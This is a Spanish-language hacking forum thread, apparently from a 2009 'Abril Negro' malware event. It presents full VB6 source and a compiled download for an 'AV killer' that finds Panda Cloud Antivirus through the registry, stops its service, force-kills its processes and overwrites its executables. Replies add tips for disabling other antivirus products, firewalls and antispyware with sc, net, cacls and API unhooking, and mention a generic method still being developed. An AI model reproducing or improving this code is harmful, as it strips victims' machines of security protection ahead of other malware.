Bueno, primero quiero aclarar que este programa/source no entra dentro del "concurso de desarrollo de malware de Abril Negro 2009". Pero sí entra dentro del boletín para Abril Negro 2009, como prueba de concepto...

Anti Cloud Antivirus by MadAntrax

He diseñado una simple función que aprovecha los comandos típicos de Windows (taskkill, net, etc...) y los he aplicado en forma de bucles FOR y Sleep's para generar un AV-Killer genérico. En éste caso lo he diseñado para el nuevo Cloud Antivirus de Panda



Que es Cloud Antivirus?

Es el nuevo antivirus gratuito desarrollado por Panda, usando un método de programación que evita sobrecargar la CPU del usuario (Cloud Computing). He analizado el AV y he decidido crear un AV Killer para "matar" el nuevo producto de Panda.

:http://www.cloudantivirus.com/default.aspx?lang=spa
:http://es.wikipedia.org/wiki/Computaci%C3%B3n_en_nube

El source del programa es el siguiente:

modAntiCloudAV.bas

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
 
Function StopService(ByVal sName As String) As Boolean
    On Error Resume Next
    Dim i As Integer
 
    For i = 1 To 3
        Shell "net stop " & sName, vbHide
        Sleep 250
    Next i
    Sleep 1000
    DoEvents
    StopService = True
End Function
 
Function DestroyFile(ByVal sFileName As String, ByVal sFilePath As String) As Boolean
    On Error Resume Next
    Dim i As Integer
 
    For i = 1 To 3
        Shell "taskkill /F /IM " & sFileName, vbHide
        Sleep 250
    Next i
    Sleep 1000
    DoEvents
 
    For i = 1 To 3
        Open sFilePath For Output As #1
            Print #1, "destroyed!"
        Close #1
        Sleep 10
    Next i
    DoEvents
    DestroyFile = True
End Function
 

Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...). Para usar el módulo y matar CloudAV se utiliza así:

Private Sub CommandXP1_Click()
    On Error Resume Next
 
    Dim WShell As Object
    Dim CloudPath As String
 
    CommandXP1.Enabled = False
    Set WShell = CreateObject("WScript.Shell")
        CloudPath = WShell.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Panda Security\Nano Av\Setup\Path")
    Set WShell = Nothing
 
    If CloudPath = "" Then
        MsgBox "No se ha encontrado Cloud Antivirus instalado en el sistema", vbExclamation, "Anti-CloudAV"
    Else
        StopService "NanoServiceMain"
        DoEvents
        DestroyFile "PSUNMain.exe", CloudPath & "PSUNMain.exe"
        DoEvents
        DestroyFile "PSANHost.exe", CloudPath & "PSANHost.exe"
        DoEvents
        DestroyFile "PSANToManager.exe", CloudPath & "PSANToManager.exe"
        DoEvents
        'CloudAV destroyed
        MsgBox "Proceso finalizado correctamente, comprueba si tu CloudAV sigue funcionando", vbInformation, "Anti-CloudAV"
    End If
    CommandXP1.Enabled = True
End Sub
 

El source es mejorable, se puede modificar para que no haga tantos bucles ni tantos sleep's y mejorar la rápidez. Pero como es una prueba de concepto... prefiero dejarlo así para evitar posibles copy&paste de noob's. Los que quieran usar ésta técnica tendrán la oportunidad de programarse correctamente un modulo más eficiente (evitar usar el objecto WScript, no usar Shell, cifrar las String's, control de errores, etc...)



LINK DE DESCARGA: antiCloudAV (Fichero Compilado + Source en VB6)

Saludos.

Es "acojonante" (como dice un amigo)  ver como puedes detener facilmente un antivirus desde "sc" o desde "net", detener el servicio, eliminarlo del arranque y ya.

No se si habrá algún antivirus que deniege la detención del servicio aunque es dificil ya que si eres admin y no puedes detener un servicio propio de tu pc entonces pierdes el control y tendrias que pasar a system cosa que ahora desde xp es muy fácil de hacer.

De esta misma forma hasta puedes detener sistemas de proteccion que no necesariamente sea un antivirus, como por ejemplo un sistema de seguridad de internet, firewall, sniffer, etc.

Con "cacls" puedes asecinar de igual forma a los antispywares que no están corriendo siempre.

El nod32 v4 no se deja matar asi y el karpesky tampoco. habra mas pero yo solo se esos. La forma de matarlos es quitando los hook en las apis de terminar procesos

Saludos

Buen PoC Mad

No conocía ese AV

Yo ahora mismo estoy trabajando en un método genérico de matar cualquier AV... si saber nombre de procesos ni ruta de instalación ni información especifica de un AV... por ahora solo lo he probado con NOD32 (v3) y Avira (Antivir 2009) (Los únicos que tengo instalados en las VM )

Cualquier novedad os hago un tema

Saludos

PD: Siempre me falta tiempo

Todavía estoy desarrollando el concepto... teóricamente es posible... luego vienen los problemas claro...

Tu AV Killer utiliza los nombres de procesos y las Keys del registro que almacenan el Path?